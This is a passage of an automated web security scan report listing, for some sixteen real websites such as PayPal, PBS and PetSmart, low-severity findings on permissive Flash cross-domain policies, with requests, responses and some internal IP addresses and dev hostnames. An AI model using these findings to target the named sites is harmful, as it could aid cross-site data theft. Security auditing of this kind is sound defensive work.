       <allow-access-from domain="*.mtvi.com"/>
       <allow-access-from domain="*.peanut-d.mtvi.com"/>
       <allow-access-from domain="*.peanut-q.mtvi.com"/>
       <allow-access-from domain="*.parentsconnect.com"/>
       <allow-access-from domain="*.mtvnservices.com"/>
       <allow-access-from domain="viacom.fcod.llnwd.net"/>
...[SNIP]...
7.380. http://www.partypoker.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.partypoker.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.partypoker.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 16 Feb 2011 17:55:42 GMT
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 03:05:43 GMT
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.partypoker.com" r (nz 1 vz 1 lz 1 od 1 cz 1) gen true for "http://tracker.partypoker.com" r (nz 1 vz 1 lz 1 od 1 cz 1))
Keep-Alive: timeout=5, max=91
Content-Type: text/xml
Connection: Keep-Alive
Date: Sat, 02 Apr 2011 03:05:43 GMT
Age: 0
Content-Length: 440

<cross-domain-policy>
   <allow-access-from domain="www.partypoker.com" secure="true"/>
   <allow-access-from domain="videos.partypoker.com" secure="true"/>
   <allow-access-from domain="*rss.partypoker.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.partypoker.com" secure="true"/>
   <allow-access-from domain="en-new-partypoker.dev" secure="true"/>
   <allow-access-from domain="maxymiser.hs.llnwd.net/*" secure="true"/>
...[SNIP]...
7.381. http://www.paypal.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.paypal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.paypal.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:37:42 GMT
Server: Apache
Last-Modified: Tue, 10 Jun 2008 20:10:41 GMT
Accept-Ranges: bytes
Content-Length: 312
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.paypal.com" />
<allow-access-from domain="*.ebay.com" />
<allow-access-from domain="*.paypalobjects.com" />
...[SNIP]...
7.382. http://www.pbs.org/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pbs.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pbs.org

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:25 GMT
Server: Apache/2.2.17 (Unix)
Set-Cookie: www.apache.sid=1860a232d224230ba77e2f75eccad67e; path=/; domain=.pbs.org
Accept-Ranges: bytes
Content-Length: 1204
Connection: close
Content-Type: text/xml
X-Pad: avoid browser bug

<cross-domain-policy>
<allow-access-from domain="*.pbs.org"/>
<allow-access-from domain="*.pbskids.org"/>
<allow-access-from domain="www-tc.pbs.org"/>
<allow-access-from domain="www.pb
...[SNIP]...
<allow-access-from domain="pbskids.org"/>
<allow-access-from domain="www-tc.pbskids.org"/>
<allow-access-from domain="wrpx.service.mirror-image.net"/>
...[SNIP]...
<allow-access-from domain="*.tribalnova.com"/>
<allow-access-from domain="*.pbskidsplay.org"/>
<allow-access-from domain="*.theplatform.com"/>
<allow-access-from domain="dipsy.pbs.org"/>
<allow-access-from domain="*.chumby.com"/>
<allow-access-from domain="209.98.43.18"/>
<allow-access-from domain="174.129.32.152"/>
<allow-access-from domain="widgets.pbs.org"/>
...[SNIP]...
<allow-access-from domain="174.129.43.74"/>
<allow-access-from domain="ec2-184-73-243-168.compute-1.amazonaws.com"/>
...[SNIP]...
<allow-access-from domain="*.comcastcim.edgesuite.net" />
<allow-access-from domain="*edgesuite.net" />
...[SNIP]...
7.383. http://www.pch.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pch.com

Response

HTTP/1.1 200 OK
Content-Length: 462
Content-Type: text/xml
Last-Modified: Fri, 04 Jun 2010 19:30:08 GMT
Accept-Ranges: bytes
ETag: "a5bd4d571c4cb1:900"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:27:30 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="
...[SNIP]...
<allow-access-from domain="*.pch.com"/>
   <allow-access-from domain="a1708.g.akamai.net"/>
   <allow-access-from domain="*.aghtd.com"/>
...[SNIP]...
7.384. http://www.pchlotto.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pchlotto.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pchlotto.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 04 Nov 2010 21:30:54 GMT
ETag: "ab4b74-1d7-49440df6b1f80"
Accept-Ranges: bytes
Content-Length: 471
Content-Type: text/xml
Date: Sat, 02 Apr 2011 14:05:18 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-d
omain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.pch.com"/>
<allow-access-from domain="*.*.pch.com"/>
<allow-access-from domain="a1708.g.akamai.net"/>
<allow-access-from domain="*.aghtd.com"/>
<allow-access-from domain="164.109.104.3" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="www.continuumjournals.com"/>
...[SNIP]...
7.385. http://www.petfinder.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.petfinder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.petfinder.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.4 (Unix) mod_apreq2-20051231/2.6.0 mod_perl/2.0.3 Perl/v5.8.5
Last-Modified: Wed, 28 Jul 2010 18:49:30 GMT
Accept-Ranges: bytes
Content-Length: 382
Content-Type: application/xml
Expires: Sat, 02 Apr 2011 13:38:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:38:20 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.discovery.com" />
   <allow-access-from domain="www.bakerandhill.com" />
   <allow-access-from domain="www.bakerandhillapps.com" />
   <allow-access-from domain="*.draftfcb.info" />
   <allow-access-from domain="*.theshelterpetproject.org" />
   <allow-access-from domain="*.petfinder.com" />
...[SNIP]...
7.386. http://www.petside.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.petside.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.petside.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 16 Mar 2009 14:55:40 GMT
ETag: "b61105-c4-4653da4d9f300"
Content-Type: application/xml
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 13:44:41 GMT
Date: Sat, 02 Apr 2011 13:43:41 GMT
Content-Length: 196
Connection: close

<?xml version="1.0"?>
<!-- crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="*.nbcuni.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
</cross-domain-policy>
7.387. http://www.petsmart.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.petsmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.petsmart.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:32 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 08 May 2008 01:49:36 GMT
ETag: "53c78d-30d-44cae4b2b6c00"
Accept-Ranges: bytes
Content-Length: 781
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:50:32 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.petsmart.com" secu
...[SNIP]...
<allow-access-from domain="*.petsmart.com" secure="true" />
...[SNIP]...
<allow-access-from domain="pet.imageg.net" />
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="172.20.1.172" />
<allow-access-from domain="172.21.1.172" />
<allow-access-from domain="206.16.220.172" />
<allow-access-from domain="63.240.110.172" />
<allow-access-from domain="preview.gsipartners.com" secure="true" />
...[SNIP]...
7.388. http://www.pga.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pga.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pga.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:44 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 15:23:54 GMT
Accept-Ranges: bytes
Content-Length: 2034
Content-Type: application/xml
Cache-Control: max-age=120
Expires: Sat, 02 Apr 2011 13:53:44 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.pga.
...[SNIP]...
<allow-access-from domain="pga.com"/>
<allow-access-from domain="i.pga.com"/>
<allow-access-from domain="*.pga.com"/>
<allow-access-from domain="beta.pga.com"/>
<allow-access-from domain="ads.pga.com"/>
<allow-access-from domain="www.pgatour.com"/>
<allow-access-from domain="pgatour.com"/>
<allow-access-from domain="i.pgatour.com"/>
<allow-access-from domain="tourfeeds.pga.com"/>
<allow-access-from domain="*.pgatour.com"/>
<allow-access-from domain="*.rydercup.com"/>
<allow-access-from domain="*.cnn.com"/>
<allow-access-from domain="*.turner.com"/>
<allow-access-from domain="*.cnn.net"/>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net"/>
<allow-access-from domain="m.2mdn.net"/>

<allow-access-from domain="m2.2mdn.net"/>
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="*.i-traffic.com"/>
<allow-access-from domain="ar.atwola.com"/>
<allow-access-from domain="*.itraffic.com"/>
<allow-access-from domain="*.agency.com"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.time.com"/>
<allow-access-from domain="*.VillageVoice.com"/>

<allow-access-from domain="*.nymag.com"/>
<allow-access-from domain="*. salon.com"/>
<allow-access-from domain="*.secondthought.com"/>
<allow-access-from domain="*.clk4.com"/>
<allow-access-from domain="servedby.advertising.com"/>
<allow-access-from domain="bannerfarm.advertising.com"/>
<allow-access-from domain="*.advertising.com"/>
<allow-access-from domain="*.crewintegrated.com"/>
<allow-access-from domain="gfx.klipmart.com"/>
<allow-access-from domain="*.klipmart.com"/>
...[SNIP]...
7.389. http://www.pgatour.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pgatour.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pgatour.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:41 GMT
Server: Apache
Last-Modified: Fri, 06 Aug 2010 20:57:01 GMT
Accept-Ranges: bytes
Content-Length: 1774
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="pga-livescoring.chester.contentproject.com"/>
   <allow-access-from domain="*.pgatour.com"/>
   <allow-access-from domain="*.pga.com"/>
   <allow-access-from domain="i.cdn.turner.com"/>
   <allow-access-from domain="*.cnn.com"/>
   <allow-access-from domain="*.turner.com"/>
   <allow-access-from domain="*.cnn.net"/>
   <allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net"/>
   <allow-access-from domain="m.2mdn.net"/>
   <allow-access-from domain="m2.2mdn.net"/>
   <allow-access-from domain="*.2mdn.net"/>
   <allow-access-from domain="*.i-traffic.com"/>
   <allow-access-from domain="ar.atwola.com"/>
   <allow-access-from domain="*.itraffic.com"/>
   <allow-access-from domain="*.agency.com"/>
   <allow-access-from domain="*.aol.com"/>
   <allow-access-from domain="*.time.com"/>
   <allow-access-from domain="*.VillageVoice.com"/>
   <allow-access-from domain="*.nymag.com"/>
   <allow-access-from domain="*. salon.com"/>
   <allow-access-from domain="*.secondthought.com"/>
   <allow-access-from domain="*.clk4.com"/>
   <allow-access-from domain="servedby.advertising.com"/>
   <allow-access-from domain="bannerfarm.advertising.com"/>
   <allow-access-from domain="*.advertising.com"/>
   <allow-access-from domain="*.crewintegrated.com"/>
   <allow-access-from domain="gfx.klipmart.com"/>
   <allow-access-from domain="*.klipmart.com"/>
   <allow-access-from domain="*.viewpoint.com"/>
   <allow-access-from domain="*.unicast.com"/>
   <allow-access-from domain="*.go123ov.com" secure="false" />
...[SNIP]...
7.390. http://www.philly.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.philly.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.philly.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=3600
Content-Type: text/xml;charset=utf-8
Date: Sat, 02 Apr 2011 13:36:15 GMT
Expires: Sat, 02 Apr 2011 14:36:15 GMT
Last-Modified: Mon, 28 Mar 2011 08:09:32 GMT
Server: ECS (dca/532A)
Via: 1.0 dv-c1-r2-u7-b4:3128 (squid)
X-Cache: HIT
X-Server-Name: dv-c1-r3-u14-b14
Content-Length: 4529
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="www.philly.com" />

<allow-access-from domain="dev.www.philly.com" />

<allow-access-from domain="stage.www.philly.com" />

<allow-access-from domain="media.philly.com" />

<allow-access-from domain="cms.clickability.com" />
...[SNIP]...
<allow-access-from domain="inquirer.philly.com" />

<allow-access-from domain="www.argentumwebs.com" />

<allow-access-from domain="argentumwebs.com" />

<allow-access-from domain="www.biemedia.com" />

<allow-access-from domain="biemedia.com" />

<allow-access-from domain="support.biemedia.com" />

<allow-access-from domain="inquirer.philly.com" />

<allow-access-from domain="go.philly.com" />

<allow-access-from domain="aps1.philly.com" />

<allow-access-from domain="*.brightcove.com" />

<allow-access-from domain="rss.teamfanshop.com" />

<allow-access-from domain="feeds.teamfanshop.com" />

<allow-access-from domain="images.footballfanatics.com" />

<allow-access-from domain="concepts.philly.com" />

   <allow-access-from domain="http://doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="http://ad.doubleclick.net"/>
   <allow-access-from domain="http://ad.uk.doubleclick.net"/>
   <allow-access-from domain="http://ad.ie.doubleclick.net"/>
   <allow-access-from domain="http://ad.fr.doubleclick.net"/>
   <allow-access-from domain="http://ad.es.doubleclick.net"/>
   <allow-access-from domain="http://ad.it.doubleclick.net"/>
   <allow-access-from domain="http://ad.de.doubleclick.net"/>
   <allow-access-from domain="http://ad.nl.doubleclick.net"/>
   <allow-access-from domain="http://ad.se.doubleclick.net"/>
   <allow-access-from domain="http://ad.au.doubleclick.net"/>
   <allow-access-from domain="http://ad.jp.doubleclick.net"/>
   <allow-access-from domain="http://ad.cn.doubleclick.net"/>
   <allow-access-from domain="http://ad.tw.doubleclick.net"/>
   <allow-access-from domain="http://ad.hk.doubleclick.net"/>
   <allow-access-from domain="http://creatives.doubleclick.net"/>
   <allow-access-from domain="http://dfa.doubleclick.com"/>
   <allow-access-from domain="http://dfa.doubleclick.net"/>
   <allow-access-from domain="http://dfp.doubleclick.com"/>
   <allow-access-from domain="http://dfp.doubleclick.net"/>
   <allow-access-from domain="http://motifcdn.doubleclick.net"/>
   <allow-access-from domain="http://motifcdn2.doubleclick.net"/>
   <allow-access-from domain="http://m.doubleclick.net"/>
   <allow-access-from domain="http://m.2mdn.net"/>
   <allow-access-from domain="http://m.uk.2mdn.net"/>
   <allow-access-from domain="http://m.fr.2mdn.net"/>
   <allow-access-from domain="http://m.de.2mdn.net"/>
   <allow-access-from domain="http://m.se.2mdn.net"/>
   <allow-access-from domain="http://m.au.2mdn.net"/>
   <allow-access-from domain="http://m.jp.2mdn.net"/>
   <allow-access-from domain="http://m.cn.2mdn.net"/>
   <allow-access-from domain="http://m.tw.2mdn.net"/>
   <allow-access-from domain="http://m.hk.2mdn.net"/>
   <allow-access-from domain="http://m1.doubleclick.net"/>
   <allow-access-from domain="http://m1.2mdn.net"/>
   <allow-access-from domain="http://m1.jp.2mdn.net"/>
   <allow-access-from domain="http://m2.doubleclick.net"/>
   <allow-access-from domain="http://m2.2mdn.net"/>
   <allow-access-from domain="http://m3.doubleclick.net"/>
   <allow-access-from domain="http://m3.2mdn.net"/>
   <allow-access-from domain="http://demo.doubleclick.com"/>
   <allow-access-from domain="http://demo.doubleclick.net"/>
   <allow-access-from domain="http://sandbox.dartmotif.com"/>
   <allow-access-from domain="http://2mdn.aolcdn.com"/>
   <allow-access-from domain="http://static.2mdn.net"/>
   <allow-access-from domain="http://s0.2mdn.net"/>
   <allow-access-from domain="http://s1.2mdn.net"/>
   
<allow-access-from domain="www.phrequency.com" />

<allow-access-from domain="dev.www.phrequency.com" />

<allow-access-from domain="stage.www.phrequency.com" />

<allow-access-from domain="media.phrequency.com" />

<allow-access-from domain="www.citypaper.net" />

<allow-access-from domain="dev.www.citypaper.net" />

<allow-access-from domain="stage.www.citypaper.net" />

<allow-access-from domain="media.citypaper.net" />

<allow-access-from domain="*.issuu.com" />

<allow-access-from domain="dev.kb.philly.com" />

<allow-access-from domain="stage.kb.philly.com" />
...[SNIP]...
7.391. http://www.picnik.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.picnik.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.picnik.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:30:34 GMT
Server: Apache/2.2.4
Last-Modified: Tue, 01 Feb 2011 19:39:18 GMT
ETag: "304-b02ea580"
Accept-Ranges: bytes
Content-Length: 772
Cache-Control: max-age=7200
Expires: Sat, 02 Apr 2011 15:30:34 GMT
P3P: CP="NOI DSP COR CUR ADM DEV OUR BUS UNI"
X-Picnik-Info: h=w110.sea.picnik.com t=1301751034414528 D=165
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!--http://www.picnik.com/crossdomain.xml-->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.picnik.com" secure="false" />
...[SNIP]...
<allow-access-from domain="l.yimg.com" secure="false" />
...[SNIP]...
<allow-access-from domain="staging.flickr.com" secure="false" />
...[SNIP]...
<allow-access-from domain="backstage.flickr.com" secure="false" />
...[SNIP]...
7.392. http://www.playsushi.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.playsushi.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.playsushi.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:50 GMT
Server: Apache
Last-Modified: Fri, 10 Jul 2009 19:42:18 GMT
ETag: "1d98c56-124-46e5f2b861a80"
Accept-Ranges: bytes
Content-Length: 292
Cache-Control: max-age=18000
Expires: Sat, 02 Apr 2011 18:34:50 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*.plscdn.com" secure="false"/>
...[SNIP]...
7.393. http://www.plentyoffish.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.plentyoffish.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.plentyoffish.com

Response

HTTP/1.1 200 OK
Content-Length: 225
Content-Type: text/xml
Last-Modified: Fri, 11 Sep 2009 18:23:24 GMT
Accept-Ranges: bytes
ETag: "9cb61ff3c33ca1:946"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:27:00 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.plentyoffish.com" />
...[SNIP]...
7.394. http://www.pogo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pogo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pogo.com

Response

HTTP/1.1 200 OK
Age: 89720
Date: Fri, 01 Apr 2011 12:39:58 GMT
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"562-1272402607000"
Last-Modified: Tue, 27 Apr 2010 21:10:07 GMT
Content-Type: text/xml
Content-Length: 562
Server: Apache-Coyote/1.1

<?xml version="1.0" encoding="ISO-8859-1"?>

<!--
This file is to allow .swfs being served from the ea and double click domains listed below to access XML data (or other services) from the domain th
...[SNIP]...
<allow-access-from domain="*.pogo.com"/>
   <allow-access-from domain="*.pogobeta.com"/>
   <allow-access-from domain="*.ea.com"/>
   <allow-access-from domain="*.easports.com"/>
   <allow-access-from domain="*.pogospike.com"/>
...[SNIP]...
7.395. http://www.politico.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.politico.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.politico.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.6 (Fedora)
Last-Modified: Wed, 09 Mar 2011 16:46:27 GMT
ETag: "ffc69-2ce-784f3ec0"
Content-Type: text/xml
Cache-Control: max-age=10
Expires: Sat, 02 Apr 2011 13:27:05 GMT
Date: Sat, 02 Apr 2011 13:26:55 GMT
Content-Length: 718
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.politico.com" />
   <allow-access-from domain="*brightcove" />
   <allow-access-from domain="*.brightcove" />
   <allow-access-from domain="*.brightcove.com" />
   <allow-access-from domain="*.politiconetwork.com" />
   <allow-access-from domain="brightcove.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cache.btrll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="admin.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.google-analytics.com"/>
   <allow-access-from domain="*.omniture.com"/>
...[SNIP]...
7.396. http://www.politicsdaily.com/crossdomain.xml  previous  next

